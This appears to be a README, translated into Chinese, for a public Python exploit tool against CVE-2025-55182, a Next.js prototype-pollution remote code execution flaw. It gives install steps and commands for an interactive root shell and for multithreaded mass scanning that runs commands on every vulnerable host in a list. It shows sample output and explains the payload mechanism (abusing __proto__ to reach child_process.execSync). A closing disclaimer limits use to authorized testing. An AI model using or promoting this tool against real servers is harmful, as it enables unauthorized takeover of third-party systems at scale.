一个用于 CVE-2025-55182 的 Python 2.7 漏洞利用工具——该漏洞是 Next.js 应用程序中的一个严重原型污染 / RCE 漏洞。
该工具支持单目标交互式 Shell 和多主机批量扫描,具备多线程、彩色输出以及自动 HTTPS 回退功能。
https://id 更改为任意命令(whoami、ls 等)requests(易于安装)requests 库 —— 使用以下命令安装:
pip install requests
git clone https://github.com/Jenderal92/cve-2025-55182.git
cd CVE-2025-55182
pip install requests
使脚本可执行(可选):
chmod +x CVE-2025-55182.py
python2 CVE-2025-55182.py https://target.com
或者不带协议(将自动添加 HTTPS):
python2 CVE-2025-55182.py target.com
一旦连接并确认存在漏洞,您将获得一个 Shell 提示符:
$ id
uid=0(root) gid=0(root) groups=0(root)
$ whoami
root
$ ls -la
...
内置命令:
exit / quit —— 关闭 Shellclear —— 清屏help —— 显示帮助准备一个文件,每行一个目标(可带或不带 http/https):
targets.txt
app-site3.htface.tech
https://example.com
http://127.0.0.1:3000
vulnerable-site.org
运行批量扫描(默认:10 个线程,命令 id,输出文件 res.txt):
python2 CVE-2025-55182.py targets.txt
自定义线程数、命令、输出文件:
python2 CVE-2025-55182.py targets.txt 20 "whoami" results.txt
20 —— 线程数whoami —— 在每个存在漏洞的目标上执行的命令results.txt —— 输出文件(仅保存存在漏洞的条目)批量扫描输出示例:
[INFO] Loaded 4 URLs
[INFO] Threads: 10, Command: 'id', Output: res.txt
[*] (1/4) Checking: https://site.com
[+] VULNERABLE: https://site.com
Status: 303
Output: uid=0(root) gid=0(root) groups=0(root)
[-] NOT VULNERABLE: https://example.com
...
已保存的结果(res.txt):
domain : https://site.com
cmd : uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------
该漏洞利用会向 Next.js 端点发送一个精心构造的 multipart/form-data 请求(如果路径为空,则附加 /login)。
它滥用原型污染(__proto__:then 和 constructor:constructor)来注入一个恶意前缀,从而使用 child_process.execSync() 执行系统命令。
服务器会响应一个 303 重定向,其中包含位于 x-action-redirect 头(或 Location)中的命令输出。该工具从 /login?a=<output> 中提取结果。
本工具仅用于教育目的和授权安全测试。 未经授权访问计算机系统属于违法行为。作者对因使用本软件而造成的任何误用或损害不承担任何责任。 在使用此漏洞利用工具之前,您必须获得目标系统所有者的明确书面许可。
更多免责声明,请参阅 Jenderal92 主页上的封面声明。您可以点击 此处查看 !!!